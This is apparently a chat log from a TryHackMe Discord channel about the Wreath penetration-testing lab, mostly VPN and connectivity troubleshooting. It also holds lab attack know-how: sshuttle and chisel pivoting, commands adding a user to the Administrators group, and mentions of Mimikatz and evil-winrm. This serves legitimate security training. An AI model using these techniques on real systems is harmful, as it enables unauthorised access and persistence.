I did that last night when Trouble shooting with an admin but nothing wrong with trying it again. Will let you know
oh my god thank you so much
Gave +1 Rep to @tacit crane
yep it works now odd that is didnt work when I did that before but o well
we need one more reset plz
anyone seen this before? I google the error and tried to make changes to the config file as well as restarted the service but that doesn't work.
Where'd you put the SSH key?
I put it in the current directory I'm working in. I didn't put it in /root/.ssh
.
So you need to specify that key, with a flag in your SSH command
So someone's probably edited the authorized_keys file
wow
thanks for the heads up
need 3 more ppl to vote to reset this
also because I was root I tried adding a user to the root group and logging in with my new user but it wouldn't let me fyi
You'd need to add a key for them too. I'd add a sudoer rather than adding a user in the root group.
cant get ssh to work on wreath
connection closed by port 22
using verbose flags shows ' expecting SSH2_MSG_KEX_ECDH_REPLY '
In the pins in #site-support there is an MTU fix. Try that.
unfortunately that didnt work
ive even tried adding a new user and generating ssh keys etc still no dice
I had same issue
There are many instances
Please state the 3rd octet to avoid unnecessary resets.
Mods are not site staff
I was simply stating that your request needs more detail otherwise people would vote to reset when nothing is broken.
Has anyone done port forwarding on this box?
Can anyone help me a sec for the Wreath network? I downloaded the specific file for persistent access, but it does not let me connect using that file
With another VM, the SSH connection works, so it's an issue with my kali, can someone help?
This is the debug log
hi may I get some help? i tried regenerating, clearing cache and trying different browsers and also different regions but unable to dl wreath's config file. i keep getting 404.
resolved
I had to use sudo with my command and I needed to play with the permissions of the file (chmod)
sudo apt-get update && sudo apt-get upgrade -y
Looking for additional votes (currently 1/5) to reset the 10.x.90.x network.
Hosts are unreachable.
You might already know, but in case no one else votes, you can reset it on your own.
Might take some time, but you can vote for reset once per hour
Thanks for the reply - that's my current plan.
Gave +1 Rep to @barren bluff
yep
same
10.x.90.x is fkn toying w me
ive been trying to get that shit working for like an hour now
need one more vote to reset please guys
Appears to be working for me, although someone has requested 1 reset.
got a problem right at the beginning, did the changes in /etc/hosts and can ping the url, but don't get anything in a browser, no matter if firefox or chromium
nevermind, got it
how did you get it?
my host also went through a vpn that interfered with the openvpn connection here
i think someone fucked up the wreath network again
cant connect to the .200 machine via ssh
and im connected to the wreath network for sure, checked the website and openvpn running normally
god damnit
cant have shit here ive been trying to complete this for like 3 days
gonna get sub
I can't download the ovpn...I get a message about smth got lost in the matrix
and even holo-network got problems
paid 10$ to do these boxes and they don't works
2/2
-.-
its tough :/
can you go on the wreath network and request a reset?
need only 2 more resets and it should work
this happened last time
and dont extend timer
There are lots of network instances.
did
i realised this the hard way
now i have to wait for 2 hrs to reset them myself
smh
ty
problem is
i can't download the vpn file lol
looks like the file is corrupted or smth
or the path
also are you from like egypt or china
can anyone get empire c2 working on parrot os
it keeps telling me unsupported os when installing from git clone
lmk
ty ❤️
I keep having a 404 error after I try to download the configuration file for wreath
anyone can help or is having the same issue ? The config works with Holo
also like is there any kind of way to contact a staff member in some way ?
cause I'm having issue on holo room with the nmap (only display the port 22 open instead of 22 and 80)
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /web/exploit-Gumbygumberson.php was not found on this server.</p>\n</body></html>
this is the output when running the python exploit
@wise kelp
never mind im an idiot
Anyone on the x.x.101.x wreath network? Need help with a network reset
I've had the same issue for the past week - I have just given up smh
sad thing is that there is literally 0 support
i tried to ask several time here but there is no support if anyone has any issue with the machines
very disappointed so far with the service
I paid smth and I can't use it
Did you email support@tryhackme.com?
The discord is run by volunteers. It is not the official avenue for support.
Also nothing we can do about that error in here -- including me, and I built the network.
It's been a long term problem. There are unofficial possible fixes, but the bug is as yet unfixed
Forwarding this issue now.
Try leaving and re-joining the room. Room progress will not be affected.
hey, what exactly happens after 9 days? Do I lose access or get a cooldown? I unintentionally started it and I am actually planning to use it after 13 days
You'll be moved to a different network
A different instance of Wreath
Basically it's to make sure there are as few idle users in the networks as possible
oh, ok
Nothing to worry about at least
makes sense, can I pull out to avoid congestion from my end?
btw, thank you for your prompt reply!
Gave +1 Rep to @strange bison
Take the elevator to Mezzanine
Anybody know why I cant hit the hosts on the network even though my VPN says its connected on THM?
I was working on it earlier, my laptop restarted and now I just cant hit any of the hosts
I am having same issues with wreath. I am showing as connected in top green bar and also output openvpn shows connected. i am able to ping 10.10.10.10. but i cant run any scans or ping the host in the diagram
have regenerated my certificate already and rebooted my vm as a test already
Good Neighborhood
is the starting machine 10.200.90.200 available? I see .250 but I don't see .200
Https://Thm/access/, then choose tab network
I cant connect to wreath. I downloaded the configuration file and got error. Then I decide to read it with cat. There is nothing inside. It is literally 0 bytes. I downloaded again. Regenerate and download again. Nothing seems to working. Any ideas ?
For the 404 error when generating a VPN file
Just leave the Wreath room.
To do this go to the and select the gear setting icon next to Help and press 'leave'. Then rejoin into the network and you should be able to generate a new Wreath VPN file
greetings all
im currently on task 13, doing the socat. i uploaded the socat binary, but the machine tells me that i couldnt run binaries
any work around on this ?
like usual it is static binary vs binary looking for all the libs
Hello everyone, I have a question, I am trying to download the Wreath Network but I am getting an error from THM website
Leave the room. wait 5 min(s) then retry.
ok i will try it.
same problem for me
after leaving the room and entering again it worked!
@sharp ice thanks , it works.
Gave +1 Rep to @sharp ice
understood, thanks man
Gave +1 Rep to @split harbor
Hi, im currently doing task 6, but somehow after typing shell, the terminal froze and there's a problem with the script as well
That ain't a problem with the script. Read the error, what is it telling you?
Can anyone give me a hand, I am trying to ping the main machine(.200). I have downloaded the OVPN
I had access earlier and it stopped when the box ran out of time, I have left the room and rejoined but nothing is working
I think you need to download a new VPN pack everytime you leave and re-join, I could be wrong.
Just noticed..it works now
That ain't an excuse not to learn what went wrong there
What was the error?
Missed sudo
Eh, that's a workaround but throwing sudo at everything ain't the best idea in the world.
What was wrong? Why did it want higher permissions?
I saw the permission denied and thought there wasn't enough privilege
Decided to try sudo
You're correct with that, but it shouldn't need sudo. What specifically was it trying to do when it got permission denied?
Read the stack trace in the screenshot -- what was the last thing it tried to do?
Running commands.txt?
That is a text file. Running it, no.
It's trying to write to it. Look at the line above: prompt_toolkit/history.py, then the actual line is opening the file ab -- append bytes.
In other words, you don't have permission to write in the directory you've downloaded the script to
I see. Why don't i have the permission?
No idea 🤷‍♂️
Guessing you cloned it using sudo
i did. will that affect things?
Yes. It will download the files as the root user, meaning they will be owned by the root user, not your own account.
Which is why you get permission denied. You don't own the directory.
Nice. Understood now. thanks
I never suspect that I can login to windows just with hash, ❤️ evil-winrm, each day I am more fascinated to tryhackme and cybersecurity community.
Hi anyone know of a way that I should be using extractor to get the website commit as this is the error
Hi, i get a 404 if i want to download the vpn-file, could anybody help me? the regenerate of the file works.
Hi,
I am trying to create proxy tunnel using sshuttle however I am receiving this warning is this normal or not ?
$ sudo sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.200.81.0/24 -x 10.200.81.200
[sudo] password for offsec:
c : Connected to server.
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.
@main blaze hi, yes you can leave the wreath room and reconnect after 5 min and try downloading the vpn-file and it should work. this is what they told me and what I did and works with me.
Hello, I'm trying to download the VPN file but it's saying 0bytes after download, It was working just fine yesterday
You need to rename the WebSite to .git
trying to use chisel, chisel for me work perfectly perfect
Maybe you have full space, so the file is created to write it but since you have full space nothing is written
@cedar mulch thanks for the reply, what do you mean by full space?
Gave +1 Rep to @cedar mulch
Sometimes I have had full space on the disk and when I tried to download something I did not get an error, but I only saw that the file weighed 0 bytes
@cedar mulch I have 44% free space on my kali box. If thats what you mean
do you have a lot of experience in Penetration testing ?
Not much, I'm level 8 in tryhackme
try to regenerate and then download it
ok I will try
If it doesn't work, try another browser.
tell me
let's say we have the same environment like wreath network, how can i set a pivoting to it without having any compromised box?
this is possible?
You have to have access to an already compromised machine and on that machine there is another machine to which you do not have access, without connectivity to its network, even if you do not have that machine compromised. If for example you can see port 80/tcp, you can pivot to that port without having access to that machine
Example: I am machine A, and I have compromised machine B, from machine B I have access to machine C, but I do not have access to machine C from my machine A
I can pivot to have access to machine C from my machine A
I see
For that I have to listen with a pivoting program like chisel on machine A and execute port forwarding again with a pivoting program on machine C. That will send the data from machine C, through machine B to the machine A
I guess you will run chisel on A and B boxes
And later?
If you don't have access to machine B, you definitely won't have access to machine C, so there's no way you can do a port forward to machine C to machine A without having access to machine B, if that's what you mean
You have access to machine B, simply by opening a port on machine B, so that the data from machine C is forward there, and so you access in the browser the ip and the port of machine B that forwards data from the machine C
You are machine A, and there are two more machines, you only have access to one which is B, but you do not have access to C, and there is also another machine, which is D, which can only be accessed from C When you have machine B compromised, you can listen there to forward the ports
I understand, thanks for the explanation @cedar mulch
Gave +1 Rep to @cedar mulch
already did that
who else is in .57 subnet?
This is taking forever
curl is working just fine, foxy proxy is slow
i forgot to turn it on

just did it now it works
Let me look at
4/5 asked for reset.. if you have problem to access please push reset..
Hi! I just logged back in to continue wreath and I can't ping the first machine anymore. VPN is up (I regenerated my configuration file just in case), nothing changed on my kali VM, Wreath network seems to be up and running... Is there anything obvious I'm missing?
I cant ping too.. need one more to reset machines..
Need 3 more on my subnet... Gonna work on something else in the meantime.
ok
Network 10.200.72.200, getting a 404 when downloading the .ovpn file, was previously getting a blank .ovpn file
Leaving and rejoining, regenerating and downloading still causes a 404
Regenerating the standard THM VPN file works fine.
Leaving again and rejoining put me into the 10.200.84.200 network. Regenerated the file and downloaded and now am connected
As a follow up, leaving and rejoining works. Finished the environment, very satisfying finish.
Just finished this network, that was awesome!
Holo is next!
Have fun!
getting a 404 trying to download the vpn config file
leave the room... rejoin the room... regenerate the vpn file.... wait 5 mins... download it.... tada maybe profit
thanks!
been trying for the past hour and I am still getting a 404 trying to download the VPN config. Any help would be appreciated
Using the tryhackme openvpn troubleshooting script I keep getting Fatal Error: Inline Certificate is invalid
The room was just reset it was working earlier I left the room rejoined and regenerated the file
Any other suggestions?
I seem to be getting this error only on the wreath configuration file for openvpn but the regular openvpn access has no issue and I regenerated the vpn file
should I exit the room and try again?
Is the file blank?
will have a look at the file
yes the file is blank
May I get some help on why my chisel isn't working on this network is that on purpose or am I just dumb? or can someone DM me to help, so I don't spam this room.
Hello, yesterday I had no problem today I can't ping the machine while being on the VPN
I get that sometimes, I fix it by just turning the VPN on and off, hope it helps (also try generating a new vpn file)
got an issue when using sshuttle - task 18...
sshuttle -r root@10.200.105.150 --ssh-cmd "ssh -i id_rsa" 10.200.105.150/24 -x 10.200.105.150
ssh: connect to host 10.200.105.150 port 22: Connection timed out
c : fatal: failed to establish ssh session (2)
sorted it lol
Hi, I have the python error when I try to execute the stager on .200
I can not upload the screenshot
Hey I am working my way through wreath and all was fine and good and then when I took a break and then came back I was no longer able to communicate with the network via command-line. The tryhackme access page shows that I am connected and the DNS for the website resolves and loads the site but I cannot ping, exploit or scan the IP address given even though all of these things were working before. I have already tried to kill my VPN session and go back in, regenerate and download my VPN file, restart the VM, leave the room and come back, etc all to no avail. Anyone have any ideas what might be up?
If you dont have a subscription to thm then I think it kicks you out after 10 days of working on the room. You also need a 7 day streak if you dont have a subscription. I think you can fix it by purchasing a subscription and then regenerating your vpn file.
I believe the 10 day limit is for both subscribers or non subscribers to keep the network from being filled with inactive users. Nevertheless though I am subscribed and just joined the room yesterday so that is certainly not the issue here. Thanks for trying to help though.
I was able to launch 1 successful nmap scan after regenerating my VPN but now it is ignoring all communications from me again.
I still am
I'm getting a 404 error when trying to generate a VPN file for wreath network. I started the network waited 5 minutes, went to the VPN download page. clicked refresh. Waited 10 seconds aaaaand darth vader
Any ideas?
leave and rejoin the room then retry the process of regening the ovpn file
the nc.exe getting detected by AntiVirus?
somehow ||wreath-pc\thomas|| not running curl properly.
oh okay, nvm
||Apparently windows\temp wasn't accessible to thomas :)||
Still no luck, I submitted a ticket
Hi
Wreath had wayy more new stuff for me than I expected ❣️
Hello, when I try to ssh in wreath network it tells me this: "Permission denied (publickey,gssapi-keyex,gssapi-with-mic)"
anyone else experiencing that?
Good morning! I was going to hop in the Wreath Network today but anytime I go to Access and try to get a special .vpn for Wreath Network, it gives me a 404 with a Darth Vader helmet. Any ideas?
404 When trying to download the Wreath Network VPN?
Can you head over to the room https://tryhackme.com/room/wreath
Press "options" -> "leave room"
After that, click here -> https://tryhackme.com/jr/wreath
Once you have rejoined the network, make sure to regenerate your new configuration file by heading to https://tryhackme.com/access, selecting the network from the dropdown, and finally clicking "regenerate"
Ensure to wait up to 2 minutes before downloading your OpenVPN file!
Hi, I had the same issue and following the steps allowed me to download the vpn file. However, the vpn file is always empty. I've tried leaving and joining the room again and downloading the file but it is always empty
I also tried regenerating the file multiple times (and waiting a few minutes) but get the same issue
Have you guys been able to connect to the Wreath Box? I can't ping it anymore, and I've been able to get the OpenVPN setup working
Is the network running?
Any update on the empty wreath VPN file from anyone?
For me it's straight up 404 no matter what i do, i tried the recommended fix multiple times
I'm a subscriber using AttackBox, I launched an nmap scan for the first 15000 ports and got no response, maybe there is an issue on the network.
If there is any subscribers here, please push the button "Reset" in order to wipe the network config, up to now, there are 4/5 Reset, we need just one to reset the network configuration and maybe resolve all our initial issues.
4/5 asking for RESET, if you have an issue accessing the machine, push RESET button.
anyone else experiencing same problem?
I was the 5th reset. Hopefully this fixes it. I'm going to try again this weekend.
it seems there is some issue with wreath room. as it is showing 'Network state: Resetting' for a very long time. Also from the attack box we are not able to connect to the vulnerable machine i.e 10.200.90.200
Yes this is the network I'm having issues with as well. I think my VPN file issue is related to this connection issue
I think the issue at the tryhackme end not our end.
Yes I agree
Has there been any updates on the network? I think I raised this issue at the start of the week but I haven't heard anything.
It's a bit annoying since I wanted to do this network before an exam next week.
@fair breach could you check on this please? ♥️
hi! I am only getting blank vpn profiles for Wreath
tried rejoining the room, regenerating profiles, and nothing works
please and thanks for any help!
Did you ever get this working?
Yes the VPN is non-empty now. Thanks for fixing this
Gave +1 Rep to @cunning island
Same issue here.
Have you tried the steps explained in the pinned messages?
I have, yes. It's downloading but just 0bytes.
So you have left the room, waited, rejoined, regenerated, and waited?
Correct.
I tried clearing cache etc too, not too sure what else I can do. I will follow those steps again.
Welp, site is broke
Yeah, not too sure.
hey. sorry for the late response.. but yes, exact same thing
Is there any movement on this?
I see we're all having issues doing wreath with its vpn?
I tried the pinned resolution multiple times, no luck. VPN file downloads with no data
yup
@fair breach can you help us?
Yea im off this upcoming mon-thurs so itd be nice to use that learning with the Wreath room
For me it's been in the state of resetting for over 2 hours now
i'm still unable to Download the wreath vpn conf file just straight up 404, even when i try the recommended fixes. It's been like this for over 1 week now.
Hello everyone, does everyone have such a problem or is it just me?)
I have the same issue
add me to the list of people with the 0 byte Wreath openvpn file
me too!!!
I am using tryhackme attackbox there also I can see a blank ovpn file
also I am not able to ping the vulnerable machine or through nmap
this is very weird
Has anyone had success with the pinned message instructions re: the VPN file? I tried and still have the same issue. I even tried the Troubleshooting script offered by the THM support bot https://raw.githubusercontent.com/tryhackme/openvpn-troubleshooting/master/thm-troubleshoot
Wen vpn fix
Can someone start the machine ?. The button Start is disabled
Hello Hackers!!
I'm facing difficulty in RCE for the webserver. Can you please suggest something?
hi
Guess im doing holo instead
did you check the pinned message??
Yea ive tried the pinned resolution on 3 different occasions now
well was worth confirming
Hey guys. anyone has any idea on how to start with this network. I ve tried all steps mentioned but the network is still in resetting state.
Wreaths vpn appears to work again
Hey guys been using tryhackme for a while wanted to try out the wreath room upon starting the room the port scans were saying something like 'machine not responding to requests (i dont entirely remember it was late at night)' so I tried resetting the machine, it still hasnt come back up, its been nearly 48hours. What should I do here?
What's your subnet?
10.200.81.200
What does it say up here?
Try leaving the room, waiting 5 mins and re joining.
Try leaving the room for longer then.
My network is stopped.
alright
this time it displayed a different subnet before joining, after joining went back to the same subnet which is still resetting. I mean ill try leaving it for an hour this time but idk if that will do anything
all good now finally got a different box cheers
Hello,
Got onto Wreath, I have generated an ovpn file, the network state says: Running
However, the ping of the ip indicates Destination Host Unreachable
And nmap is not more conclusive:
nmap -p 1-15000 -oA thmwreathexternal 10.200.57.200
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Hi, I did but I think the issue is a lack of interaction between me and the distant resource.
wreath vpn file is messed up
Lol, great news... Can we do something to exploit this network?
Made my way to task 21. I'm able to connect to the middle server using a reverse shell, and created an account on server 2. However, when I try to connect with evil-winrm it's giving me an error (xfreerdp works with the account):
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
Error: Exiting with code 1
I can connect with xfreerdp but it looks like windows needs to be authenticated. I'm also not certain how to transfer files to the server using that tool...rookie.
I did find a post that mentions upgrading kali, so I've started that. Was wondering if anyone has suffered through this already.
Can't generate an openvpn config for wreath
Keeps being downloaded as a blank file
EDIT: Was able to get a working .ovpn file for Wreath by leaving, waiting a bit, rejoining, waiting again, regenerate, wait, click download button :). The VPN troubleshooting script also noted my Kali box didn't have a tun0 interface and MTU value of 1500 wasn't working, but I feel like that's unrelated to the blank OVPN configs/404 error?
Anyone else still having issues downloading the Wreath .ovpn file? Clicking on the download button gives me a 404 error. I was able to recreate the issue in an incognito Chrome tab and Safari.
Safari for MacOS version: Version 16.3 (17614.4.6.11.4, 17614)
Chrome for MacOS version: Version 110.0.5481.77 (Official Build) (x86_64)
MacOS Monterey 12.6.3
Bet, this worked
Thanks
Gave +1 Rep to @leaden spire
Np! Going to finally get started on it after lunch
Think the TL;DR is: those servers are having issues
Gonna have to wait until someone gets around to fixing them I'm afraid. I've spoken to a few staff members but no ETA just yet
@merry robin same thing with Holo I'm guessing?
No idea -- this is the only network channel I monitor
Ah, gotcha
yes it having issue for over a week now
I was able to generate the ovpn file after leaving and coming back again, then generating a new ovpn file and waiting 2 mins. The next issue is when you try to connect to the network, where it will enter an infinite loop of trying to connect but nothing happens
Story time.
so, I had problems with winrm and updated my kali box. One thread suggested updating kali so I did. It ran for a while and when it was done, I could no longer connect with openvpn. I got an error "Failed to open tun/tap interface."
I tried regenerating openvpn files but that didn't matter.
So, long story short, after wasting an hour on that, I found a sed cmd that seems to be working:
sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn
I ran that on the wreath ovpn and my user ovpn and both work now.
Now I can resurrect my annoyance with evil-winrm...
This is the extended error. The error starts about halfway down. Seems the sed command truncates the cipher name or something...IDK:
2023-02-11 11:03:41 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
2023-02-11 11:03:41 PUSH: Received control message: 'PUSH_REPLY,route 10.10.0.0 255.255.0.0,route-metric 1000,route-gateway 10.6.0.1,topology subnet,ping 5,ping-restart 120,ifconfig 10.6.1.149 255.255.128.0,peer-id 98'
2023-02-11 11:03:41 OPTIONS IMPORT: timers and/or timeouts modified
2023-02-11 11:03:41 OPTIONS IMPORT: --ifconfig/up options modified
2023-02-11 11:03:41 OPTIONS IMPORT: route options modified
2023-02-11 11:03:41 OPTIONS IMPORT: route-related options modified
2023-02-11 11:03:41 OPTIONS IMPORT: peer-id set
2023-02-11 11:03:41 OPTIONS ERROR: failed to negotiate cipher with server. Add the server's cipher ('AES-256-CBC') to --data-ciphers (currently 'AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305') if you want to connect to this server.
2023-02-11 11:03:41 ERROR: Failed to apply push options
2023-02-11 11:03:41 Failed to open tun/tap interface
2023-02-11 11:03:41 Converting soft SIGUSR1 received during exit notification to SIGTERM
2023-02-11 11:03:41 SIGTERM[soft,exit-with-notification] received, process exiting
This was self inflicted:
The instructions say:
net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add
Of course I didn't add my user to the RMU group...
Took me 2 days to solve because stupid ovpn didn't work. lol
The 'infinite loop' seems like it might be the same issue I described. Do you get a "failed to open tun/tap interface" error?? If so, try the sed (substitution) cmd above.
ok that worked
When I got a similar issue with winrm I had forgotten to set up a proxy. Sshuttle worked easiest/best
Had the shuttle tunnel set up but I forgot to add my user to the remote management users group... thanks for the response.
Gave +1 Rep to @maiden shuttle
@merry robin Do you happen to have the PNPT cert?
I do not. Don't see the point as things currently stand. Why?
Just curious, I have heard Wreath is really good practice for it. Was going to ask for your thoughts if they aligned
From memory Wreath was out before PNPT was announced, I'm afraid -- it was certainly designed beforehand. Any alignment there is purely accidental, although I'm glad to hear it if so
But no, I've not sat PNPT so I couldn't comment directly
Would you say it's good practice for the OSCP? I have heard that now includes a lot of active directory components.
The three main sections are also covered in PWK (although the content obviously differs), so from that perspective, I would consider it to be a good way to obtain an alternative or supplementary understanding of those topics.
That said, none of those three topics (pivoting, AV evasion, and C2 usage) are likely to come up in the exam, so 🤷
And yes, the new OSCP exam contains an active directory network. Wreath, uh, definitely does not help with that -- it doesn't cover AD.
Gotcha, thanks for the advice
prod_serv is unreachable for me, anyone else facing similar issue?
Currently working for me
noice! it is working, but I still wonder what was causing the issue.
When I tried to download the vpn file for wreath, the page had a 404 error. Can't generate an openvpn config
Leave the room, wait 2 minutes, join back, regenerate the config, wait 1 minute, download
It's good practice for the pivoting part. Pivoting is explained really well in the Wreath room. Knowing different techniques can help in case one does not work
Thanks
Gave +1 Rep to @forest vapor
Tunnels are so fun
machine dead?
Shouldn't be, was working last night
back up
On the 404 ovpn train :), see if it downloads later
I can't download the wreath ovpn file, it says 404
404 here as well
have you tried to follow the instructions in the pinned message for leaving and rejoining the room then regening the config and waiting 2 mins then downloading it
yes
Hey everyone, looking for some help with tunnels
Currently doing wreath and have a double tunnel, only thing is I can't get a NC through to test the connection
When running NC on the windows machine, It tells me the port which I'm local forwarding through the tunnel is open, then immediately closes. It doesn't try to establish a connection with the NC listener on the other side
Any tips?
I guess I am the only one still getting the 404?
most definitely not
Getting the following error while using evil-winrm any suggestions?
Error: Exiting with code 1
Anyone knows how to install Powershell-Empire on Arch Linux? I tried installing it from the AUR, but I have to resolve a lot of missing dependencies manually which does not seem like an ideal way to do it. The install script in the BC-Security project only works on Debian based distros.
is it normal to get Load key "key": error in libcrypto
Hi guys!
Has someone tried to adapt the exploit code for a web server for a full pseudoshell?
Task-20 is the first additional question.
Has anyone managed to do this?)
Who shut down the vulnerable service? It's immoral, okay?
Also, please don't reset the network at will. Please check whether it is your own problem first. It is immoral to reset the network at will.
Please consider other people's feelings and don't modify any passwords, services, etc. in the machine.
I have experienced the need to start over because someone changed my password and reset the network at will, and now I have experienced the vulnerability fixed by others.
Please follow the tryhackme rules, thank you.
Dunno about immoral but it's definitely a dick move lmao
If the administrator can find out who did the good deed, please deal with it seriously. This is a public laboratory, not a private drone.
What administrator 
I had that issue where I couldn't load any web pages and it was due to me having 2 openvpn connections active. Took me forever to figure it out
is someone able to get into the webserver? I keep getting "permission denied" although || I freshly extracted the private key?|| yesterday the same command worked just fine
Hello, I have problems in task 18, when I run sshuttle I can't access 10.200.x.150 in the browser, any solution?
On task 41, something seems odd. How are we able to upload a file from our attack machine to the personal PC?
- We can connect to the webserver directly.
- When we access the git server, we're pivoting through the webserver.
- When we do a port scan on the personal PC, we're doing a double pivot.
Based on that, surely the personal PC shouldn't be able to access a web server on our attack machine? In the reverse shell, I can ping my attack machine, and tracert says that it's going via .250 (the OpenVPN server).
Putting it another way, is this a deliberate design choice, or an accident that we wouldn't encounter in a real-life scenario?
Outbound connections are rarely restricted in the same way
Think of your own home network -- your PC can reach out through NAT, but you can't connect straight to it from elsewhere on the planet, right?
Exactly the same thing. The way I pitched this network it was supposed to be a NAT network with a DMZ. Would have used different IP ranges to simulate that. e.g. the 10.x.x.200 address would have been your "public" IP assigned to the router with a port forward through to the webserver on something like 192.168.2.x, then the two Windows boxes would have been on something like 192.168.3.0/24 (ranges made up for simplicity). The insinuation being that there was a firewall restricting access from the DMZ to the private LAN, but poorly configured to accidentally allow bidirectional access to the git server rather than only inbound access.
Unfortunately AWS doesn't like that very much, so instead you get it simulated with security groups and a single IP range.
Thanks for the reply, and I appreciate that AWS imposed some restrictions on what you'd like to do.
For me, the odd aspect is that the Git server can't connect straight back to my attack machine (e.g. I needed to create an HTTP-Hop listener in PowerShell Empire) whereas the personal PC can. Since they're on the same subnet, NAT shouldn't be a factor (i.e. both Windows machines should behave the same way). The only reasons for different behaviour are:
a) If the firewall is restricting outbound connections from the Git server but not from the PC.
b) If the Git server and PC have different routing tables (which I think is actually the case).
Gave +1 Rep to @merry robin
Oh, the git server.
The real reason for that is because pivoting was one of the three big objectives to teach and I wanted to up the difficulty on it lmao. In actuality it's a security group thing.
If you want an "in story" reason for it, you could say that it's an outbound firewall stopping the git server from accessing unapproved IP ranges. Unlike the PC (used for browsing, etc), there's no reason for a server which only runs a self-hosted repository manager to have unrestricted outbound access 🤷
Cool, that makes sense, I just wanted to make sure that I haven't missed some fundamental concept.
Thank you again for the room in general: I've learned loads from doing it, and I can think of various past situations when these skills would have come in really useful!
Gave +1 Rep to @merry robin
Np!
If anyone has access to instance 90, I think it needs a reset. E.g. I can't ping 10.200.90.200, and Nmap says that the ports are filtered.
Edit: I waited for the network to shut down due to inactivity, then restarted it. I still can't ping that machine, but the ports are open now.
hi guys can someone reset
-unmute @full spindle Don't try to ping everyone in the discord
Unmuted AngelusMortis#2778
Hello, did everyone manage to connect to 10.200.81.150 - git-server in task 21 the first time?
At first I thought the problem was that I was making Reverse SSH connections, I used the shuttle, but when connecting via evil-winrm, the connection does NOT occur.
As with xfreerdp, an error.
What do you think I'm doing wrong?
The site itself is working.
I have also encountered this problem, which needs to be solved by restarting the Windows system.
Do you mean, after you received the shell on Windows, running
shutdown /r /t 0 command
yes
But this requires system permissions.
You can use the system permission obtained by that cve.
I'll have to try.
Thank you for the information, Sugobet!
Hmm, unfortunately, it didn't work out.
I rebooted the windows-box, but in the end the connection cannot be made.
Neither via xfreerdp, nor via evil-winrm.
it feels like the problem is something else.
Has anyone had serious lag issues in this room when using a kali vpn with THM network?
anyone here to answer me?
Let's walk back a step and troubleshoot. Are you able to SSH in with that key?
Hi, I'm having an issue using xfreerdp, it's not showing the window, instead showing this msg
"More documentation is coming, in the meantime consult source files"
@rigid umbra I'm having the same issue with xfreerdp, not running properly. Let me know if you fixed it?
For some reason, mimikatz will not run properly on the Windows machine for me; I tried over both evil-winrm and xfreerdp. Any ideas?
I loaded Invoke-Mimikatz.ps1 into memory on evil-winrm and then ran it once it was in memory, and it errors out when I run Invoke-Mimikatz (without the .ps1 after that finishes)
no
do you think someone is on the network thats why i cant do anything? @merry robin
is there an admin here? @old pendant
because session with the network timed out or stalled
What of this?
@merry robin I'm having an issue using xfreerdp as it's not opening the window and instead showing this msg
"More documentation is coming, in the meantime consult source files"
any solution?
have you opened port 9000 (should use >15000) in the webserver firewall? or try transferring the file with scp from the kali machine
Hello, I have a problem with my VPN access, first I had the problem of the 404 page, I followed the methodology of the pinned message, but now when I download the vpn it is not under the format "USERNAME-wreat.ovpn" but a random string, I tried to connect with this one but nothing did
Do you have a cipher error?
I am unable to access the vpn, just keeps restarting the connection and is not completed. Tried checking the file it has the connection info, tried leaving the room and going back, tried regenerating the vpn and still nothing
Do you have a cipher error?
yes
sorry only looked at it properly from the screenshot
You need to change that in your script.
Just open the script in a text editor and change cipher to data-cipher or data-ciphers.
Whichever it tells you to change it to